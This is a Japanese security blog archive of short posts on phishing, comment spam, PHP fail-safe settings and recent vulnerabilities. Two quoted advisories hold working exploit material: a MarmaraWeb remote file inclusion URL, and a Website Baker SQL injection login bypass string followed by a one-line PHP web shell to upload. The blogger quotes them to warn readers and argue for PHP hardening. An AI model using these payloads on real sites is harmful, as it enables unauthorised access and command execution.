MS、マック用『IE』のサポートを年内で終了

MS、マック用『IE』のサポートを年内で終了

例えば、DELLのショッピングサイトなどはIEしかサポートしていません。

FirefoxのUser Agent Switcherを使えばDELLのショッピングサイトでもLinux+Firefoxでも発注できる(多少問題はありますが)ので致命的とは言えませんが、普通にFirefoxをサポートしてくれるようになってほしいですね。

Mac用IEの終了でFirefoxサポートが加速される?!

狙い撃ちフィッシング – スピアフィッシング

特定のターゲットのみ狙い撃ちするスピアフィッシング(スピアーフィッシングとは中銃や銛を使い魚を突く事)前からあるのですが、ITMediaの翻訳記事にあったので。困った物ですよね。見ないとならないようなメールで来ると開かざるを得ないですから。この記事以外にもネットショップ経営者にクレームメールを装ったフィシングも話題になっていました。(これは日本の話)

VMwarePlayer等を使ってWebとメールは仮想ホスト上で実行するくらいの用心が必要になってきてます… ちなみに私はそこまでしてません…

コメント&トラックバックスパムが…

コメント&トラックバックスパムが増えてきています。さっきも20数個のスパムを削除しました。TODOとしてCAPTCHA導入… しかし、CAPTCHAを入れるとアクセシビリティの問題も発生するので公共系サイトでは気をつけないとならないですね。

ところでWikipediaのCAPTCHAページ、リンクが豊富ですね。
http://ja.wikipedia.org/wiki/Captcha

ITMediaでもコメント&トラックバックSPAMが話題になってますね。
http://www.itmedia.co.jp/enterprise/articles/0512/20/news046.html
しかし、何故かCAPTCHAに言及してませんね。

Mambo, Coppermine, PHPBBが攻撃対象に

Mambo, Coppermine, PHPBBがワームか何かの攻撃対象になっているそうです。

Mambo、PHPBBは日本でもよく利用されていると思います。
Coppermineはフォトギャラリーの様ですね。

攻撃に成功するとlistenと言うmalwareをインストールされるそうです。

ところでXMLRPCの不具合を狙った攻撃が行われている、とこのブログにも書いたかも知れませんがこの攻撃も続いています。もしXMLPRCを使っているPHPアプリで対策を取られていない方は直ぐにシステムをチェックした方が良いと思います。
# XMLRPC脆弱性への攻撃は私のサーバログにも残っています。
# 上記の3つのアプリケーションへの攻撃があるかは出先なの
# で確認していません。

セキュリティ対策:3つの基本

プログラミング言語によらずセキュリティ対策には3つの基本があると思います。

1.外部からの入力は信用せず、形式、範囲が想定内か確認する
2.外部システムへ出力を行う場合は適切なエスケープ処理を行う
3.セキュリティ上の問題が発生しても被害を最小限に留める措置を行う

1.の外部からの入力は信用しない、にはユーザからの入力だけでなく他のサブシステムの入力も信用してはならないです。例えばqmailのコマンド郡は同じ作者が作っているにも関わらずお互いに信用していません。

2.の適切にエスケープ処理を行う、はシステムに合った最適なエスケープ処理を行う事が必要です。例えば、システム上のコマンドを実行する場合やSQL文を実行する場合、適切なエスケープ処理は処理系によって異なる場合があります。

3.はfail safe機能は使えるものは使う、という事です。プログラミング上でのセキュリティ対策ではないですが適切な例を思いつかなかったのでGCCのstack protector機能を例に説明します。GCCにはstack protectorと言う機能を追加する事ができます。この機能を追加すれば仮に1.の「外部入力を信用しない」を守った「つもり」でプログラム作っていても、万が一スタックオーバーフローがあった場合でも任意コードを実行される危険性を大幅に低減することが可能になります。

どうしてわざわざこんな事を書くかというと、fail safeとして有用な機能やコードに対して「どうして有用なのか解らない」と思われてしまうケースがよくあるからです。Cプログラマでオーバーフローが発生したときにコード実行を防止してくれる機能がどうして有用なのか解らない、と考えられる方は少ないと思います。
# OSやGCCの基本機能として入れるか、入れないか、という部分では
# いろいろ議論の余地はあるとは思いますが…

使用する言語を問わず致命的な問題にならないよう対策が取れる場合は有用に活用するべき、と私は考えています。fail safeな機能や仕組みは軽視されがちですが、私は非常に重要だと考えています。普通はだれでも間違えたくて(バグを作りたくて、セキュリティホールを作りたくて、など適当に読み替えてください)間違える訳ではありません。それでも間違いは起きる物です。間違いは起きるのは当たり前、を前提とするとfail safe機能の重要性は理解してもらえるのはないか、と考えています。

このブログでセキュリティ上の対策などを断片的に書く事がありますが、これらの基本は踏まえた上での対策として書いています。

ところで、PHPの場合、fail safe機能として利用できる機能には

– open_basedir設定
– allow_url_fopen設定
– カスタムエラーハンドラ登録

があります。safe_modeもありますがPHP6では削除候補なので入れていません。
# あまりよく考えていないので他にもあるかも。コメント歓迎します。

追記:
fail safe的な機能として利用できる機能:
-disable_function設定
-disable_classes設定
-max_execution_time設定
-max_input_time設定
-post_max_size設定
-memory_limit設定
-log_errors設定
-auto_prepent/append設定
-シャットダウン関数登録
-file_upload設定
-upload_max_filesize設定
-default_socket_timeout設定
-DB接続の永続的接続無効化

Blogger Web Commentsは便利ですね

Blogger Web Comments for Firefoxと言うFirefox拡張をインストールしてみました。

最初は勝手にポップアップウィンドウが開くのが少々いやでしたが結構便利です。自分のブログにトラックバック無しでリンクを張って頂いている方のブログなども見れて非常に便利です。

今見ているページに関連したブログのページが見えるのは良いですね。ただ、今のところはSPAMに対する対策が十分ではない(?)ようで普通のページなのにBlogger Web Comments表示されているリンクが明らかにアダルトサイトになっているページもありました。しかし、そこまでやるんですね。アダルトサイト運営者恐るべし…

Googleのdefine: 機能が拡張されてますね

久しぶりにGoogle Definitionsを使ってみると、機能が拡張されていました。

define: 日本

で検索すると、日本語と中国語の定義は検索しているようでした。残念ながらまだ準備中(?)なのか日本語の定義は表示されませんでしたが、中国語の定義は表示されました。

結構便利な機能なので早く日本語も使えるようになると助かります。

Wikipediaに掲載されている情報の信頼性

Wikipediaに掲載されている情報はslashdot.jpでも議論されれている通り嘘の情報を書き込みが原因で大騒ぎになっていました。

過去にはワザと嘘の情報をWikipediaに掲載してどれくらいで修正されるか?という実験をした方もいたのですが情報元を失念…

CNet Japanの記事はWikipediaはBritannicaと同等レベルで信頼できるとする調査結果をレポートしています。

Britannicaも完全ではない、という事で一安心?!

やはり、まだある単純リモートスクリプト実行バグ..

Bug-TraqからMarmaraWeb E-commerceにリモートスクリプト実行脆弱性があることがレポートされていました。グーグルで検索しても日本語サイトが無いことから日本では利用されていないECアプリと思います。

MarmaraWeb E-commerce Remote Command Exucetion

###Hi all
###B3g0k[at]hackermail.com
###Kurdish Hacker
###Special Thanx All Kurdish Hackers
###Freedom For Ocalan!!!
###———————————–
###MarmaraWeb E-commerce Remote Command Exucetion
###———————————–
###Site: http://www.marmaraweb.com/referanslar.php#eticaret
###
###Description:An E-commerce scirpt coded by MarmaraWeb.
### selling produces from internet like books,DVDs,roasted chickpeas etc..
###=))
###
###
###Vulnerable:http://[target]/index.php?page=http://yourevilcode?&cmd=
###
###Vulnerable:http://[target]/?page=http://yourevilcode?&cmd=
###
###
###Solution : no I’m sorry =))
###
###Contact : B3g0k[at]hackermail[dot]com
###B3g0k [Kurdish Hacker]
###Freedom For Ocalan!!!
###Her B�j� Defacera Kurd!!!
###Greetz KHC,Serwebun Team,KHA,KCA

今年の6月頃にPHPプロジェクトの開発者MLで「allow_url_fopenがINI_SYSTEMに変更されたのはセキュリティ上問題である」と問題提起(詳しくはこのブログエントリを参照)したのですが、「何のセキュリティ対策になるのか分からない」とメールする人もいるくらいでした… 

このレポートにあるような脆弱性はPHP初心者にはありがちなミスです。やはり私が提案していた対策は必要だと確認できる脆弱性でした。

自分の身は自分で守る、ということでallow_url_fopenをINI_SYSTEMからINI_ALLに変更するパッチはこちらです。

mb_send_mailの脆弱性を利用したSPAM送信

mb_send_mailのRFC822形式の宛先ヘッダの処理がmailと違った為にSPAMの踏台にされた、という問題があったのですがどのプログラムかな?と思いつつ調べていなかったのですが、たまたま見付けました。serendipityだったようです。

http://blog.s9y.org/archives/80-Arbitrary-header-inclusion-in-Mail-Entry-plugin.html
http://www.s9y.org/forums/viewtopic.php?p=17772
http://xtian.goelette.info/index.php?url=archives/38-Email-injection-attack.html

Flashのアップグレードし忘れ

「Macromedia Flash Player SWF File Handling Arbitrary Code Execution」と言う不具合があったのでWindowsの方はFlashPlayer8にアップグレートしていたのですが、Linuxの方をアップグレードし忘れていました…

The vulnerability also affects libflashplayer.so on the Unix platform

という事で、Linuxの場合はFlashPlayer8は無いのでFlashPlayer 7.0.60以上でなければならないでそうす。

最近の流行のPHPアプリ脆弱性公開と攻撃手法の解説

最近公開されているPHPアプリの攻撃手法には以前に見られない傾向があります。例えば、Wesite Bakerというアプリケーション(私はこのアプリが何なのかもしりません)ですが、SQLインジェクション脆弱性を使用しシステムに不正に侵入した後、丁寧に管理者であれば公開ディレクトリにファイルがアップロードできる仕様を利用して任意コマンド・スクリプトを実行する手順まで解説しています。

最近、親切(?)に脆弱性を攻撃する方法が解説されているケースが増えています。公開されているPHPのアプリケーションにはセキュリティ上問題が含まれている事が少なくありません。OSSであることは安全性の十分条件ではありません。公開されているアプリ、ツールを利用されている場合も細心の注意が必要です。

# これも使ったことがないですが、Zen-Cart(1.2.6d以下)も
# SQL Injection => リモートコマンド実行の脆弱性が公開され
# ています。利用されている方は必要な対処を早急に行うべきで
# す。

Website Baker <=2.6.0 SQL Injection -> Login bypass -A> remote code execution

software:
site: http://www.websitebaker.org/2/home/
description: “Website Baker 2, the Open Source Content Management System
designed to enable users to produce websites with ease.”

if magic_quotes_gpc off you can bypass admin login check and grant access
to administrative area, poc:

switch to:

http://[target]/[path_to_wb]/admin/

and login with:

user: ‘or isnull(1/0)/*
pass: [whatever]

now you can go to “Media” menu and upload a cmd.php file with this code inside:

<?php echo “Hi Master!”;error_reporting(0);ini_set(“max_execution_time”,0);system($_GET[cmd]);?>